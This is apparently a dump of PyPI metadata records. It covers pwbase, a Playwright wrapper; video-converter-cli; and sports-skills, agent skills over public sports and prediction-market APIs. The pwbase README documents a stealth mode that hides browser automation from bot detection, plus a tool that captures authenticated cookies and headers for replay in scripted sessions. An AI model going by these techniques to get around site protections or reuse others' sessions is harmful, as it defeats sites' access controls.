| CDP | `CDP` | Attaches to an existing Chrome instance via Chrome DevTools Protocol |
### Default
```python
Browser(BrowserConfig(type=BrowserType.DEFAULT))
```
### Stealth
```python
Browser(BrowserConfig(type=BrowserType.STEALTH))
```
### CDP
Start Chrome with remote debugging enabled:
```bash
google-chrome --remote-debugging-port=9222
```
Then attach:
```python
Browser(BrowserConfig(type=BrowserType.CDP, cdp_url="http://localhost:9222"))
```
> **Note:** `headless`, `state_path`, `viewport`, and related options are ignored in CDP mode. `save_state()` is not available in CDP mode.
## BrowserConfig Reference
```python
from dataclasses import dataclass, field
from pathlib import Path

@dataclass
class BrowserConfig:
    type: BrowserType = BrowserType.DEFAULT
    headless: bool = True
    state_path: Path | None = None  # Load/save cookies + localStorage
    channel: str = "chrome"         # Browser channel for STEALTH mode
    cdp_url: str = "http://localhost:9222"
    viewport: tuple[int, int] = (1920, 1080)
    user_agent: str = "..."         # Windows Chrome UA by default
    locale: str = "en-US"
    timezone: str = "America/New_York"
    args: list[str] = field(default_factory=lambda: [  # Extra Chromium flags
        "--disable-blink-features=AutomationControlled",
        "--no-sandbox",
    ])
```
## Saving and Restoring Browser State
```python
from pathlib import Path
from pwbase import Browser, BrowserConfig, BrowserType
config = BrowserConfig(
type=BrowserType.STEALTH,
state_path=Path("state.json"),
)
# First run — log in and save session
async with Browser(config) as browser:
page = await browser.get_page()
await page.goto("https://example.com/login")
# ... perform login ...
await browser.save_state()
# Subsequent runs — state is restored automatically
async with Browser(config) as browser:
page = await browser.get_page()
await page.goto("https://example.com/dashboard")
```
## Session Extraction
`BrowserSessionExtractor` extends `Browser` and intercepts JSON responses in real time. Use it to capture authenticated sessions without manually copying cookies or headers.
```python
from pwbase import BrowserSessionExtractor, BrowserConfig, BrowserType
async with BrowserSessionExtractor(BrowserConfig(type=BrowserType.STEALTH)) as browser:
page = await browser.get_page()
await browser.start_recording(page)
await page.goto("https://example.com")
# Trigger the API call you want to capture, then:
response = browser.find_response("api/data")
if response:
session = browser.to_session(response)
r = session.get("https://example.com/api/data")
print(r.json())
```
### API
| Method | Description |
|---|---|
| `start_recording(page)` | Begin intercepting JSON responses on `page` |
| `stop_recording()` | Stop intercepting; safe to call if never started |
| `find_response(url_contains)` | Return the most recent captured response matching the substring |
| `find_all_responses(url_contains)` | Return all captured responses matching the substring |
| `wait_for_response(url_contains, timeout)` | Poll until a matching response is captured |
| `to_session(response)` | Build an authenticated `requests.Session` from a `CapturedResponse` |
### CapturedResponse Fields
```python
@dataclass
class CapturedResponse:
url: str
method: str
headers: dict[str, str] # Response headers
body: dict | list | None # Parsed JSON body
request_headers: dict[str, str] # Request headers (HTTP/2 pseudo-headers excluded from session)
request_post_data: str | None
cookies: list[Cookie]
```
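The comment that HTTP/2 pseudo-headers are excluded from the session can be made concrete. A minimal sketch of that filtering (the helper name is hypothetical; in pwbase the equivalent logic lives inside `to_session`):

```python
def session_headers(request_headers: dict[str, str]) -> dict[str, str]:
    """Drop HTTP/2 pseudo-headers (keys starting with ':') before copying
    captured request headers onto a requests.Session."""
    return {k: v for k, v in request_headers.items() if not k.startswith(":")}
```

Pseudo-headers such as `:authority` and `:method` are part of the HTTP/2 framing, not real headers, and `requests` would reject or mangle them if copied verbatim.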
## Manual Lifecycle
If you prefer not to use the context manager:
```python
browser = Browser(BrowserConfig())
await browser.start()
page = await browser.get_page()
# ... do work ...
await browser.stop()
```
## Development
```bash
# Install with dev dependencies
uv sync --group dev
# Run tests
uv run pytest
# Run tests with output
uv run pytest -v
```
### Project Structure
```
src/pwbase/
├── __init__.py # Public API surface
├── browser.py # Browser — core async Playwright wrapper
├── browser_config.py # BrowserConfig dataclass
├── browser_type.py # BrowserType enum
└── browser_session_extractor.py # BrowserSessionExtractor + CapturedResponse
tests/
├── conftest.py # Shared async mock fixtures
├── test_browser.py # Unit tests for Browser (all three modes)
└── test_browser_session_extractor.py
```
## License
MIT
| text/markdown | null | Floyd <pagarfloyd@gmail.com> | null | null | MIT License
Copyright (c) 2025 Floyd
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE. | automation, browser, cdp, http, playwright, scraping, stealth | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Internet :: WWW/HTTP :: Browsers",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | >=3.12 | [] | [] | [] | [
"playwright-stealth>=2.0.2",
"playwright>=1.58.0",
"python-dotenv>=1.2.1",
"requests>=2.32.5",
"build>=1.4.0; extra == \"dev\"",
"pytest-asyncio>=1.3.0; extra == \"dev\"",
"pytest-mock>=3.15.1; extra == \"dev\"",
"pytest>=9.0.2; extra == \"dev\"",
"twine>=6.2.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/virgotagle/pwbase",
"Repository, https://github.com/virgotagle/pwbase",
"Issues, https://github.com/virgotagle/pwbase/issues"
] | twine/6.2.0 CPython/3.12.12 | 2026-02-20T06:32:57.515470 | pwbase-0.1.0.tar.gz | 42,425 | 5c/cd/6aacf8d1cd6e5e75991571a0860ddc1724e4440e66b7f2ad3809e762a410/pwbase-0.1.0.tar.gz | source | sdist | null | false | 7c8238ea9d21d4e3b63186becb5e558c | 21dd7116b69f058040334457b0522eb32c6c00e9f957381366bbcf2a590be754 | 5ccd6aacf8d1cd6e5e75991571a0860ddc1724e4440e66b7f2ad3809e762a410 | null | [
"LICENSE"
] | 235 |
2.4 | video-converter-cli | 1.1.6 | Command-line tool to convert videos and images between formats (FFmpeg + Pillow) | # Video and Image Converter
Command-line tool to convert videos and images between formats (FFmpeg for video, Pillow for images).
**Developed by [L3CHUGU1T4](https://github.com/L3CHUGU1T4)**
---
## Install (PyPI)
Requires Python 3.8+ and [FFmpeg](https://ffmpeg.org/download.html) (for video conversion; images work without it).
```bash
pip install video-converter-cli
```
---
## Requirements
- Python 3.8+
- FFmpeg (for video conversion)
- Pillow (included via pip)
---
## Usage
Run `converter` from any directory:
```bash
converter --help
```
### Arguments and options
| Argument / Option | Description |
|-------------------|-------------|
| `files` | One or more video or image files to convert. |
| `-o`, `--output PATH` | Output file path (only when converting a single file). |
| `--quality {ultrafast,fast,medium,slow,veryslow}` | Video encoding preset (default: `medium`). |
| `--crf N` | Video quality 18–28; lower = better (default: `22`). |
### Default output
- **Videos:** `<name>.mp4` in the same directory.
- **Images:** JPEG/JPG → `<name>.png`; others → `<name>.jpg`.
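The default naming rule above can be sketched as a small helper (illustrative only; the real CLI implements this internally):

```python
from pathlib import Path

VIDEO_EXTS = {".avi", ".mp4", ".mov", ".mkv", ".webm", ".flv", ".wmv", ".m4v"}

def default_output(path: str) -> str:
    """Apply the documented defaults: videos -> .mp4, JPEG/JPG -> .png,
    other images -> .jpg, always in the same directory."""
    p = Path(path)
    ext = p.suffix.lower()
    if ext in VIDEO_EXTS:
        return str(p.with_suffix(".mp4"))
    if ext in {".jpg", ".jpeg"}:
        return str(p.with_suffix(".png"))
    return str(p.with_suffix(".jpg"))
```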
### Supported formats
- **Video:** AVI, MP4, MOV, MKV, WebM, FLV, WMV, M4V
- **Image:** JPEG, PNG, BMP, TIFF, WebP, GIF
---
## Examples
```bash
converter video.avi
converter video.avi -o output.mov
converter image.jpg
converter image.png -o output.jpg
converter video.avi --quality slow --crf 18
converter file1.avi file2.jpg file3.png
```
---
## Building an executable locally (optional)
If you want a standalone executable (no pip) on your machine:
```bash
pip install -r requirements.txt
python build_exe.py
python install.py
```
Or manually:
```bash
pip install pyinstaller
pyinstaller --onefile --name converter Converter.py
```
The executable will be in `dist/converter` (or `dist/converter.exe` on Windows).
---
## Publishing to PyPI
To publish or update the package on PyPI:
```bash
pip install build twine
python -m build
twine upload dist/*.whl dist/*.tar.gz
```
(Use `build_exe.py` only for building the standalone executable; use `python -m build` for the PyPI package.)
Users can then install with: `pip install video-converter-cli` and run `converter`.
---
## License
MIT License. See [LICENSE](LICENSE).
**Developed by L3CHUGU1T4**
| text/markdown | L3CHUGU1T4 | null | null | null | MIT | video, image, converter, ffmpeg, pillow, cli | [
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: End Users/Desktop",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Multimedia :: Video :: Conversion",
"Topic :: Multimedia :: Graphics :: Graphics Conversion"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"Pillow>=10.0.0",
"rich>=13.0.0",
"rich-argparse>=1.6.0",
"pyinstaller>=6.0.0; extra == \"dev\""
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.14.0 | 2026-02-20T06:32:33.899779 | video_converter_cli-1.1.6.tar.gz | 8,054 | ef/d4/7f9dfbd9b885cfcb529b87baacd556f786c3ba6f6d0063f4ddbd49fd9514/video_converter_cli-1.1.6.tar.gz | source | sdist | null | false | c2e04a9aea7496a795b3e8e5e58b6057 | 2bd40386df177e273223009fcdce348f5ffc6544e34fea74eb61d812ece26da6 | efd47f9dfbd9b885cfcb529b87baacd556f786c3ba6f6d0063f4ddbd49fd9514 | null | [
"LICENSE"
] | 213 |
2.4 | sports-skills | 0.6.0 | Lightweight Python SDK for sports data — football, F1, NFL, NBA, WNBA, NHL, MLB, tennis, CFB, CBB, golf, prediction markets, and news | # sports-skills.sh
Open-source agent skills for live sports data and prediction markets. Built for the [Agent Skills](https://agentskills.io/specification) spec. Works with Claude Code, Cursor, Copilot, Gemini CLI, and every major AI agent.
**Zero API keys. Zero signup. Just works.**
```bash
npx skills add machina-sports/sports-skills
```
To upgrade to the latest version, run the same command with the `--yes` flag:
```bash
npx skills add machina-sports/sports-skills --yes
```
---
## What This Is
A collection of agent skills that wrap **publicly available** sports data sources and APIs. These skills don't provide proprietary data — they give AI agents a structured interface to data that's already freely accessible on the web:
- **Football**: ESPN, Understat, FPL, Transfermarkt — 21 commands across 13 leagues
- **NFL**: ESPN — scores, standings, rosters, schedules, game summaries, leaders, news
- **NBA**: ESPN — scores, standings, rosters, schedules, game summaries, leaders, news
- **WNBA**: ESPN — scores, standings, rosters, schedules, game summaries, leaders, news
- **NHL**: ESPN — scores, standings, rosters, schedules, game summaries, leaders, news
- **MLB**: ESPN — scores, standings, rosters, schedules, game summaries, leaders, news
- **Tennis**: ESPN — ATP and WTA tournament scores, rankings, calendars, player profiles, news
- **College Football (CFB)**: ESPN — scores, standings, rosters, schedules, AP/Coaches rankings, news
- **College Basketball (CBB)**: ESPN — scores, standings, rosters, schedules, AP/Coaches rankings, news
- **Golf**: ESPN — PGA Tour, LPGA, DP World Tour leaderboards, schedules, player profiles, news
- **Formula 1**: FastF1 open-source library — sessions, lap data, race results
- **Prediction Markets**: Kalshi and Polymarket public APIs — markets, prices, order books
- **Sports News**: RSS feeds and Google News — any public feed
Each skill is a SKILL.md file that any compatible AI agent can load and use immediately. Data comes from third-party public sources and is subject to their respective terms of use.
> **Personal use only.** These open-source skills rely on third-party public APIs and are intended for personal, non-commercial use. For commercial or production workloads with licensed data, SLAs, and enterprise support, see [machina.gg](https://machina.gg).
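To illustrate what these thin wrappers do, here is a sketch that flattens an ESPN-style scoreboard payload into simple score rows. The JSON shape (`events[].competitions[].competitors[]`) is an undocumented assumption about ESPN's public endpoints and may change without notice:

```python
def parse_scoreboard(payload: dict) -> list[dict]:
    """Flatten an ESPN-style scoreboard JSON into one row per competition,
    keyed by homeAway with team name and score."""
    rows = []
    for event in payload.get("events", []):
        for comp in event.get("competitions", []):
            rows.append({
                c.get("homeAway", "?"): {
                    "team": c["team"]["displayName"],
                    "score": c.get("score"),
                }
                for c in comp.get("competitors", [])
            })
    return rows
```

A skill's command would fetch the scoreboard JSON over HTTP and then do roughly this kind of reshaping before handing the result to the agent.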
---
## Available Skills
### Sports Data
| Skill | Sport | Commands | Data Sources |
|-------|-------|----------|-------------|
| `football-data` | Football | 21 | ESPN, FPL, Understat, Transfermarkt |
| `nfl-data` | NFL | 9 | ESPN |
| `nba-data` | NBA | 9 | ESPN |
| `wnba-data` | WNBA | 9 | ESPN |
| `nhl-data` | NHL | 9 | ESPN |
| `mlb-data` | MLB | 9 | ESPN |
| `tennis-data` | Tennis (ATP + WTA) | 5 | ESPN |
| `cfb-data` | College Football (CFB) | 9 | ESPN |
| `cbb-data` | College Basketball (CBB) | 9 | ESPN |
| `golf-data` | Golf (PGA/LPGA/DP World) | 4 | ESPN |
| `fastf1` | Formula 1 | 6 | FastF1 (free library) |
| `sports-news` | Multi-sport | 2 | Any RSS feed, Google News |
### Prediction Markets
| Skill | Platform | Commands | Coverage |
|-------|----------|----------|----------|
| `kalshi` | Kalshi | 12+ | Soccer, Basketball, Baseball, Tennis, NFL, Hockey |
| `polymarket` | Polymarket | 10 | NFL, NBA, MLB, Soccer, Tennis, Cricket, MMA, Esports |
### Football Data Coverage
| Competition | League | Live Scores | Standings | Player Stats | xG | Transfers |
|------------|--------|-------------|-----------|-------------|-----|-----------|
| Premier League | England | Yes | Yes | Yes | Yes | Yes |
| La Liga | Spain | Yes | Yes | Yes | Yes | Yes |
| Bundesliga | Germany | Yes | Yes | Yes | Yes | Yes |
| Serie A | Italy | Yes | Yes | Yes | Yes | Yes |
| Ligue 1 | France | Yes | Yes | Yes | Yes | Yes |
| Champions League | Europe | Yes | Yes | Yes | - | - |
| FIFA World Cup | International | Yes | Yes | Yes | - | - |
| Championship | England | Yes | Yes | Yes | - | Yes |
| Eredivisie | Netherlands | Yes | Yes | Yes | - | Yes |
| Primeira Liga | Portugal | Yes | Yes | Yes | - | Yes |
| Serie A Brazil | Brazil | Yes | Yes | Yes | - | Yes |
| MLS | USA | Yes | Yes | Yes | - | Yes |
| European Championship | Europe | Yes | Yes | Yes | - | - |
---
## Quick Start
### Install a skill
```bash
npx skills add machina-sports/sports-skills
```
### Use with your AI agent
Once installed, your agent can call commands directly:
**Get today's matches:**
> "Show me all Premier League matches today"
**Get NFL scores:**
> "What are today's NFL scores?"
**Get NBA standings:**
> "Show me the current NBA standings"
**Get WNBA roster:**
> "Show me the Las Vegas Aces roster"
**Get NHL scores:**
> "What are today's NHL scores?"
**Get MLB scores:**
> "What are today's MLB scores?"
**Get ATP rankings:**
> "Show me the current ATP tennis rankings"
**Get college football rankings:**
> "Show me the AP Top 25 college football rankings"
**Get college basketball scores:**
> "What are today's college basketball scores?"
**Get PGA leaderboard:**
> "What's the PGA Tour leaderboard right now?"
**Check prediction market odds:**
> "What are the Polymarket odds for the Champions League final?"
**Get F1 race results:**
> "Show me the lap data from the last Monaco Grand Prix"
---
## Skills Reference
### football-data
Community football data skill. Aggregates publicly accessible web sources (ESPN, Understat, FPL, Transfermarkt). Data is sourced from these third-party sites and is subject to their respective terms of use.
**Commands:**
| Command | Description |
|---------|-------------|
| `get_competitions` | List all supported competitions |
| `get_current_season` | Detect current season for a competition |
| `get_season_schedule` | All fixtures for a season |
| `get_daily_schedule` | All matches across competitions for a date |
| `get_season_standings` | League table (home/away/total) |
| `get_season_leaders` | Top scorers, assist leaders, card leaders |
| `get_season_teams` | All teams in a season |
| `search_team` | Fuzzy search for a team by name across all leagues |
| `get_team_profile` | Team info, crest, venue |
| `get_team_schedule` | Upcoming and recent matches for a team |
| `get_head_to_head` | H2H history between two teams (unavailable) |
| `get_event_summary` | Match summary with scores |
| `get_event_lineups` | Starting lineups and formations |
| `get_event_statistics` | Team-level match stats (possession, shots, passes) |
| `get_event_timeline` | Goals, cards, substitutions, VAR decisions |
| `get_event_xg` | Expected goals with shot maps |
| `get_event_players_statistics` | Individual player match stats |
| `get_missing_players` | Injured and suspended players |
| `get_player_profile` | Biography, career stats, market value |
| `get_season_transfers` | Transfer history |
| `get_competition_seasons` | Available seasons for a competition |
### nfl-data
NFL data via ESPN public endpoints. Scores, standings, rosters, schedules, game summaries, and more.
| Command | Description |
|---------|-------------|
| `get_scoreboard` | Live/recent NFL scores |
| `get_standings` | Standings by conference and division |
| `get_teams` | All 32 NFL teams |
| `get_team_roster` | Full roster for a team |
| `get_team_schedule` | Schedule for a specific team |
| `get_game_summary` | Detailed box score and scoring plays |
| `get_leaders` | Statistical leaders (passing, rushing, receiving) |
| `get_news` | NFL news articles |
| `get_schedule` | Season schedule by week |
### nba-data
NBA data via ESPN public endpoints. Scores, standings, rosters, schedules, game summaries, and more.
| Command | Description |
|---------|-------------|
| `get_scoreboard` | Live/recent NBA scores |
| `get_standings` | Standings by conference |
| `get_teams` | All 30 NBA teams |
| `get_team_roster` | Full roster for a team |
| `get_team_schedule` | Schedule for a specific team |
| `get_game_summary` | Detailed box score and scoring plays |
| `get_leaders` | Statistical leaders (points, rebounds, assists) |
| `get_news` | NBA news articles |
| `get_schedule` | Schedule for a date |
### wnba-data
WNBA data via ESPN public endpoints. Scores, standings, rosters, schedules, game summaries, and more.
| Command | Description |
|---------|-------------|
| `get_scoreboard` | Live/recent WNBA scores |
| `get_standings` | Standings by conference |
| `get_teams` | All WNBA teams |
| `get_team_roster` | Full roster for a team |
| `get_team_schedule` | Schedule for a specific team |
| `get_game_summary` | Detailed box score and scoring plays |
| `get_leaders` | Statistical leaders (points, rebounds, assists) |
| `get_news` | WNBA news articles |
| `get_schedule` | Schedule for a date |
### nhl-data
NHL data via ESPN public endpoints. Scores, standings, rosters, schedules, game summaries, and more.
| Command | Description |
|---------|-------------|
| `get_scoreboard` | Live/recent NHL scores |
| `get_standings` | Standings by conference and division |
| `get_teams` | All 32 NHL teams |
| `get_team_roster` | Full roster for a team |
| `get_team_schedule` | Schedule for a specific team |
| `get_game_summary` | Detailed box score and scoring plays |
| `get_leaders` | Statistical leaders (goals, assists, points) |
| `get_news` | NHL news articles |
### mlb-data
MLB data via ESPN public endpoints. Scores, standings, rosters, schedules, game summaries, and more.
| Command | Description |
|---------|-------------|
| `get_scoreboard` | Live/recent MLB scores |
| `get_standings` | Standings by league and division |
| `get_teams` | All 30 MLB teams |
| `get_team_roster` | Full roster for a team |
| `get_team_schedule` | Schedule for a specific team |
| `get_game_summary` | Detailed box score and scoring plays |
| `get_leaders` | Statistical leaders (batting avg, home runs, ERA) |
| `get_news` | MLB news articles |
| `get_schedule` | Schedule for a date |
### tennis-data
ATP and WTA tennis data via ESPN public endpoints. Tournament scores, rankings, calendars, player profiles, and news.
| Command | Description |
|---------|-------------|
| `get_scoreboard` | Active tournaments with current matches |
| `get_calendar` | Full season tournament schedule |
| `get_rankings` | Current ATP or WTA rankings |
| `get_player_info` | Individual player profile |
| `get_news` | Tennis news articles |
### cfb-data
College Football (CFB) data via ESPN public endpoints. 750+ FBS teams with AP/Coaches/CFP rankings.
| Command | Description |
|---------|-------------|
| `get_scoreboard` | Live/recent college football scores |
| `get_standings` | Standings by conference |
| `get_teams` | All 750+ FBS teams |
| `get_team_roster` | Full roster for a team |
| `get_team_schedule` | Schedule for a specific team |
| `get_game_summary` | Detailed box score and scoring plays |
| `get_rankings` | AP Top 25, Coaches Poll, CFP rankings |
| `get_news` | College football news articles |
| `get_schedule` | Schedule by week and conference |
### cbb-data
College Basketball (CBB) data via ESPN public endpoints. 360+ D1 teams with AP/Coaches rankings and March Madness.
| Command | Description |
|---------|-------------|
| `get_scoreboard` | Live/recent college basketball scores |
| `get_standings` | Standings by conference |
| `get_teams` | All 360+ D1 teams |
| `get_team_roster` | Full roster for a team |
| `get_team_schedule` | Schedule for a specific team |
| `get_game_summary` | Detailed box score and player stats |
| `get_rankings` | AP Top 25, Coaches Poll |
| `get_news` | College basketball news articles |
| `get_schedule` | Schedule by date and conference |
### golf-data
PGA Tour, LPGA, and DP World Tour golf data via ESPN public endpoints. Tournament leaderboards, season schedules, golfer profiles, and news.
| Command | Description |
|---------|-------------|
| `get_leaderboard` | Current tournament leaderboard with all golfer scores |
| `get_schedule` | Full season tournament schedule |
| `get_player_info` | Individual golfer profile |
| `get_news` | Golf news articles |
### fastf1
Formula 1 data via the [FastF1](https://github.com/theOehrly/Fast-F1) open-source library.
| Command | Description |
|---------|-------------|
| `get_session_data` | Session metadata (practice, qualifying, race) |
| `get_driver_info` | Driver details or full grid |
| `get_team_info` | Team details or all teams |
| `get_race_schedule` | Full calendar for a year |
| `get_lap_data` | Lap times, sectors, tire data |
| `get_race_results` | Final classification and fastest laps |
### kalshi
Kalshi's [official public API](https://trading-api.readme.io/reference/getmarkets). No API key needed for read-only market data.
| Command | Description |
|---------|-------------|
| `get_series_list` | All series filtered by sport tag |
| `get_series` | Single series details |
| `get_markets` | Markets with bid/ask/volume/open interest |
| `get_market` | Single market details |
| `get_events` | Events with pagination |
| `get_event` | Single event details |
| `get_trades` | Trade history |
| `get_market_candlesticks` | OHLCV price data (1min/1hr/1day) |
| `get_sports_filters` | Sports-specific filters and competitions |
| `get_exchange_status` | Exchange active/trading status |
| `get_exchange_schedule` | Exchange operating schedule |
### polymarket
Polymarket's official public APIs ([Gamma](https://gamma-api.polymarket.com) + [CLOB](https://docs.polymarket.com)). No API key needed for read-only data.
| Command | Description |
|---------|-------------|
| `get_sports_markets` | Active sports markets with type filtering |
| `get_sports_events` | Sports events by series/league |
| `get_series` | All series (NBA, NFL, MLB leagues) |
| `get_market_details` | Single market by ID or slug |
| `get_event_details` | Single event with nested markets |
| `get_market_prices` | Real-time midpoint, bid, ask from CLOB |
| `get_order_book` | Full order book with spread calculation |
| `get_sports_market_types` | 58+ market types (moneyline, spreads, totals, props) |
| `search_markets` | Full-text search across markets |
| `get_price_history` | Historical price data (1d, 1w, 1m, max) |
| `get_last_trade_price` | Most recent trade price |
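`get_market_prices` and `get_order_book` expose a midpoint and a spread; the arithmetic behind those fields is simple. A sketch, assuming prices are quoted as probabilities in [0, 1]:

```python
def midpoint_and_spread(best_bid: float, best_ask: float) -> tuple[float, float]:
    """Midpoint is the average of the best bid and best ask; spread is their gap."""
    return (best_bid + best_ask) / 2, best_ask - best_bid
```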
### sports-news
RSS feed aggregation for sports news.
| Command | Description |
|---------|-------------|
| `fetch_feed` | Full feed with metadata and entries |
| `fetch_items` | Filtered items (date range, language, country) |
Supports any RSS/Atom feed URL and Google News queries.
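A rough sketch of the parsing `fetch_feed` has to do, using only the Python standard library on an RSS 2.0 document (a real call would fetch the XML over HTTP first, and the skill's actual parser may differ):

```python
import xml.etree.ElementTree as ET

def parse_rss(xml_text: str) -> dict:
    """Extract the feed title plus item headlines and links from RSS 2.0 XML."""
    channel = ET.fromstring(xml_text).find("channel")
    return {
        "title": channel.findtext("title"),
        "items": [
            {"title": item.findtext("title"), "link": item.findtext("link")}
            for item in channel.findall("item")
        ],
    }
```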
---
## Architecture
```
sports-skills.sh
├── skills/ # SKILL.md files (agent instructions)
│ ├── football-data/SKILL.md # 21 commands, 13 leagues
│ ├── nfl-data/SKILL.md # NFL scores, standings, rosters
│ ├── nba-data/SKILL.md # NBA scores, standings, rosters
│ ├── wnba-data/SKILL.md # WNBA scores, standings, rosters
│ ├── nhl-data/SKILL.md # NHL scores, standings, rosters
│ ├── mlb-data/SKILL.md # MLB scores, standings, rosters
│ ├── tennis-data/SKILL.md # ATP + WTA tennis
│ ├── cfb-data/SKILL.md # College football scores, rankings
│ ├── cbb-data/SKILL.md # College basketball scores, rankings
│ ├── golf-data/SKILL.md # Golf leaderboards, schedules, profiles
│ ├── fastf1/SKILL.md # F1 sessions, laps, results
│ ├── kalshi/SKILL.md # Prediction markets (CFTC)
│ ├── polymarket/SKILL.md # Prediction markets (crypto)
│ └── sports-news/SKILL.md # RSS + Google News
├── src/sports_skills/ # Python runtime (used by skills)
├── site/ # Landing page (sports-skills.sh)
├── LICENSE
└── README.md
```
Each skill follows the [Agent Skills specification](https://agentskills.io/specification):
```yaml
---
name: football-data
description: |
Football (soccer) data across 13 leagues — standings, schedules, match stats, xG, transfers, player profiles.
Use when: user asks about football/soccer standings, fixtures, match stats, xG, lineups, transfers, or injury news.
license: MIT
metadata:
author: machina-sports
version: "0.1.0"
---
# Football Data
Instructions for the AI agent...
```
---
## Compatibility
Works with every agent that supports the SKILL.md format:
- Claude Code
- OpenClaw (clawdbot / moltbot)
- Cursor
- GitHub Copilot
- VS Code Copilot
- Gemini CLI
- Windsurf
- OpenCode
- Kiro
- Roo
- Trae
---
## Coming Soon
Licensed data skills — coming soon via [Machina Sports](https://machina.gg):
| Provider | Coverage | Status |
|----------|----------|--------|
| Sportradar | 1,200+ competitions, real-time feeds | Coming Soon |
| Stats Perform (Opta) | Advanced analytics, event-level data | Coming Soon |
| API-Football | 900+ leagues, live scores, odds | Coming Soon |
| Data Sports Group | US sports, player props, projections | Coming Soon |
These will ship as additional skills that drop in alongside the open-source ones. Same interface, same JSON envelope — just licensed data underneath. Built for commercial and production use with proper data licensing, SLAs, and enterprise support.
For early access or enterprise needs, see [machina.gg](https://machina.gg).
---
## Contributing
We're actively expanding to cover more sports and data sources — and always looking for contributions. Whether it's a new sport, a new league, a better data source, or improvements to existing skills, PRs are welcome.
1. Fork the repo
2. Create a skill in `skills/<your-skill>/SKILL.md`
3. Follow the SKILL.md spec (YAML frontmatter + Markdown instructions)
4. Open a PR
See the existing SKILL.md files and the [Agent Skills spec](https://agentskills.io/specification) for format details.
Join the [Machina Sports Discord](https://discord.gg/PBYd6FbBSK) to discuss ideas, get help, or coordinate on new skills.
---
## World Cup 2026
This project ships with World Cup 2026 coverage built in. The `football-data` skill includes FIFA World Cup as a supported competition. As the tournament approaches (June 2026), we'll add dedicated World Cup skills for bracket tracking, group stage analysis, and match predictions.
---
## Data Sources & Disclaimer
This project does not own, license, or redistribute any sports data. Each skill is a thin wrapper that accesses publicly available third-party sources on behalf of the user.
| Source | Access Method | Official API |
|--------|--------------|--------------|
| ESPN | Public web endpoints | No — undocumented, may change without notice |
| Understat | Public web data | No — community access, subject to their ToS |
| FPL | Public API | Semi-official — widely used by the community |
| Transfermarkt | Public web data | No — subject to their ToS |
| openfootball | Open-source dataset | Yes — [football.json](https://github.com/openfootball/football.json) (CC0/Public Domain) |
| FastF1 | Open-source library | Yes — [FastF1](https://github.com/theOehrly/Fast-F1) (MIT) |
| Kalshi | Official public API | Yes — [Trade API v2](https://trading-api.readme.io) |
| Polymarket | Official public APIs | Yes — [Gamma](https://gamma-api.polymarket.com) + [CLOB](https://docs.polymarket.com) |
| RSS / Google News | Standard RSS protocol | Yes — RSS is designed for syndication |
**Important:**
- This project is intended for **personal, educational, and research use**.
- You are responsible for complying with each data source's terms of service.
- Data from unofficial sources (ESPN, Understat, Transfermarkt) may break without notice if those sites change their structure.
- For commercial or production use with properly licensed data, see [machina.gg](https://machina.gg).
- This project is not affiliated with or endorsed by any of the data sources listed above.
---
## Acknowledgments
This project is built on top of great open-source work and public APIs:
- **[ESPN](https://www.espn.com)** — for keeping their web endpoints accessible. The backbone of football scores, standings, schedules, lineups, match stats, and timelines across all 13 leagues. Also powers the NFL, NBA, WNBA, NHL, MLB, CFB, CBB, Tennis, and Golf skills.
- **[Fantasy Premier League](https://fantasy.premierleague.com)** — for their community API powering injury news, player stats, ownership data, and ICT index for Premier League players.
- **[Transfermarkt](https://www.transfermarkt.com)** — for player market values, transfer history, and the richest player data in football.
- **[Understat](https://understat.com)** — for xG data across the top 5 European leagues.
- **[openfootball](https://github.com/openfootball/football.json)** — open public domain football data (CC0). Used as a fallback for schedules, standings, and team lists when ESPN is unavailable. Covers 10 leagues.
- **[FastF1](https://github.com/theOehrly/Fast-F1)** — the backbone of our Formula 1 skill. Thanks to theOehrly and contributors.
- **[feedparser](https://github.com/kurtmckee/feedparser)** — reliable RSS/Atom parsing for the news skill.
- **[Kalshi](https://kalshi.com)** and **[Polymarket](https://polymarket.com)** — for their public market data APIs.
- **[skills.sh](https://skills.sh)** — the open agent skills directory and CLI.
- **[Agent Skills](https://agentskills.io)** — the open spec that makes skills interoperable across agents.
---
## License
MIT — applies to the skill code and wrappers in this repository. Does not grant any rights to the underlying third-party data.
---
Built by [Machina Sports](https://machina.gg). The Operating System for sports AI.
| text/markdown | null | Machina Sports <hello@machina.gg> | null | null | null | atp, cbb, cfb, college-basketball, college-football, f1, football, golf, kalshi, lpga, mlb, nba, ncaa, news, nfl, nhl, pga, polymarket, prediction-markets, sports, tennis, wnba, wta | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"feedparser>=6.0",
"fastf1>=3.0; extra == \"all\"",
